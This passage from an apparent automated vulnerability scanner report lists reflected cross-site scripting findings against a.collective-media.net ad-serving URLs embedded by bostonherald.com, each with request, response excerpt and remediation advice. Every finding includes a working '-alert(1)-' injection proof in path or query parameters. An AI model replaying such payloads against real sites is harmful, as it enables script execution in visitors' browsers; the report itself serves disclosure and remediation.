The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosheraldb4d68'-alert(1)-'439fb269440/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:42 GMT
Connection: close
Content-Length: 7641

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-38929048_1296266082","http://ad.doubleclick.net/adj/q1.bosheraldb4d68'-alert(1)-'439fb269440/ent;net=q1;u=,q1-38929048_1296266082,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.s
...[SNIP]...

4.67. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b712c'-alert(1)-'5c1810d0077 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/entb712c'-alert(1)-'5c1810d0077;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:43 GMT
Connection: close
Content-Length: 7641

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-65781663_1296266083","http://ad.doubleclick.net/adj/q1.bosherald/entb712c'-alert(1)-'5c1810d0077;net=q1;u=,q1-65781663_1296266083,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport
...[SNIP]...

4.68. http://a.collective-media.net/cmadj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a882'-alert(1)-'a42b4e4a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/ent?2a882'-alert(1)-'a42b4e4a6b3=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7586
Date: Sat, 29 Jan 2011 05:19:39 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31506867_1296278379","http://ad.doubleclick.net//q1.bosherald/ent?2a882'-alert(1)-'a42b4e4a6b3=1;net=q1;u=,q1-31506867_1296278379,11d765b6a10b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sp
...[SNIP]...

4.69. http://a.collective-media.net/cmadj/q1.bosherald/ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb091'-alert(1)-'152f5176ca5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/ent;sz=fb091'-alert(1)-'152f5176ca5 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Content-Length: 7614

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6075,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=fb091'-alert(1)-'152f5176ca5;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.70. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1fa1'-alert(1)-'99ecf593489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadjb1fa1'-alert(1)-'99ecf593489/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:40 GMT
Connection: close
Content-Length: 7652

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-20932346_1296266080","http://ad.doubleclick.net/adjb1fa1'-alert(1)-'99ecf593489/q1.bosherald/ent_fr;net=q1;u=,q1-20932346_1296266080,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8
...[SNIP]...

4.71. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a16d'-alert(1)-'c6afe39cbf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald2a16d'-alert(1)-'c6afe39cbf2/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:41 GMT
Connection: close
Content-Length: 7644

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-85902019_1296266081","http://ad.doubleclick.net/adj/q1.bosherald2a16d'-alert(1)-'c6afe39cbf2/ent_fr;net=q1;u=,q1-85902019_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-c
...[SNIP]...

4.72. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 525dc'-alert(1)-'e67344382a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/ent_fr525dc'-alert(1)-'e67344382a2;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:41 GMT
Connection: close
Content-Length: 7644

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54367927_1296266081","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr525dc'-alert(1)-'e67344382a2;net=q1;u=,q1-54367927_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport
...[SNIP]...

4.73. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b55c'-alert(1)-'61ca1119251 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/ent_fr?5b55c'-alert(1)-'61ca1119251=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7589
Date: Sat, 29 Jan 2011 05:19:37 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-52945228_1296278377","http://ad.doubleclick.net//q1.bosherald/ent_fr?5b55c'-alert(1)-'61ca1119251=1;net=q1;u=,q1-52945228_1296278377,11d765b6a10b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sp
...[SNIP]...

4.74. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bc0'-alert(1)-'5df599feb72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary the value crosses.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=27bc0'-alert(1)-'5df599feb72 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7619

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=27bc0'-alert(1)-'5df599feb72;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.75. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab2ef'-alert(1)-'63371fe5300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The reflected value lands inside the single-quoted document.write('...') string that emits the ad <script> tag, so a single quote in the input terminates that string and whatever follows is evaluated as JavaScript; the '-alert(1)-' canary reopens the string with its second quote so the rest of the script still parses. Because this response is a script that publisher pages load with a <script> tag (the Referer shows the bostonherald.com ad loader), the injected code executes in the including page's origin, not in a.collective-media.net's. Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent; if at all possible, the application should avoid echoing user data within this context. Where a value must be echoed, validate it against its expected grammar first (ad unit path segments and the sz value have simple fixed formats, and parameter names the server does not recognise should not be echoed at all), then apply JavaScript string escaping (\xHH or \uHHHH for every non-alphanumeric character) at every string boundary 